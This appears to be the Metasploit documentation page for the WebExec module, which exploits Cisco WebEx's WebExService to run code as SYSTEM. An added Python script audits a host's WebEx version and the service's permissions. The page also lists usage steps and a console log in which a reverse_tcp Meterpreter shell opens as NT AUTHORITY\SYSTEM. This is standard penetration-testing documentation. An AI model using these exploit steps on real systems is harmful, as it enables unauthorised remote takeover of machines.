GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/smb/webexec.md

Description

This module exploits a remote code execution vulnerability in versions of Cisco's WebEx client software earlier than v33.6.0.655.

Vulnerable WebEx clients ship with the WebExService service, which can execute arbitrary commands with SYSTEM privileges. Because permission checks are insufficient, a local or domain user can start WebExService over a remote connection and execute code.

Vulnerable Application

Cisco WebEx software v33.3.8.7 and below
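
For defenders auditing a host, the two conditions described above (a client older than v33.6.0.655 and a service that ordinary users may start) can be checked as follows. This is an added example, not part of the Metasploit documentation; the SDDL strings are constructed samples, and it assumes the service's security descriptor was obtained with `sc sdshow WebExService`.

```python
import re

FIXED_VERSION = (33, 6, 0, 655)   # threshold stated in the Description
# SDDL aliases for broad principals (standard Windows abbreviations).
BROAD = {"WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive",
         "NU": "Network", "BU": "Builtin Users", "DU": "Domain Users"}
START = {"RP", "GA", "GX"}        # RP = SERVICE_START; generic all/execute include it
ACE = re.compile(r"\(([^;()]*);[^;()]*;([^;()]*);[^;()]*;[^;()]*;([^;()]*)\)")

# Constructed samples, not captured from a real host.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPLOCRRC;;;WD)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
TIGHT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWLOCRRC;;;AU)")

def parse_version(text):
    """'v33.3.8.7' -> (33, 3, 8, 7); short versions are zero-padded."""
    parts = [int(p) for p in text.strip().lstrip("vV").split(".")]
    return tuple(parts + [0] * (4 - len(parts)))

def can_start(rights):
    """True if an ACE rights field (hex mask or two-letter codes) grants start."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & 0x10)   # SERVICE_START bit
    return bool(START & set(re.findall("..", rights)))

def start_grants(sddl):
    """Broad principals holding an allow ACE (type A) with the start right."""
    return [BROAD[sid] for kind, rights, sid in ACE.findall(sddl)
            if kind == "A" and sid in BROAD and can_start(rights)]

def audit(version, sddl):
    """Return findings for an installed version and a service SDDL string."""
    findings = []
    if parse_version(version) < FIXED_VERSION:
        findings.append(f"WebEx {version} is older than v33.6.0.655")
    findings += [f"{who} may start WebExService" for who in start_grants(sddl)]
    return findings

if __name__ == "__main__":
    for line in audit("33.3.8.7", WEAK_SDDL):
        print("FINDING:", line)
```

Audit ACEs in the SACL (type `AU`) are ignored, so only allow entries in the DACL produce a finding.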

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/smb/webexec

  4. Do: set RHOSTS <IP>

  5. Do: set SMBUser <USERNAME>

  6. Do: set SMBPass <PASSWORD>

  7. Do: run

  8. You should get a shell.

Scenarios

Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86

```
msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set smbuser a_user
smbuser => a_user
msf5 exploit(windows/smb/webexec) > set smbpass password
smbpass => password
msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
rhosts => 192.168.37.136
msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/smb/webexec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] 192.168.37.136:445 - Connecting to the server...
[*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
[*] 192.168.37.136:445 - Command Stager progress - 0.96% done (999/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress - 1.91% done (1998/104435 bytes)
...
[*] 192.168.37.136:445 - Command Stager progress - 99.47% done (103880/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```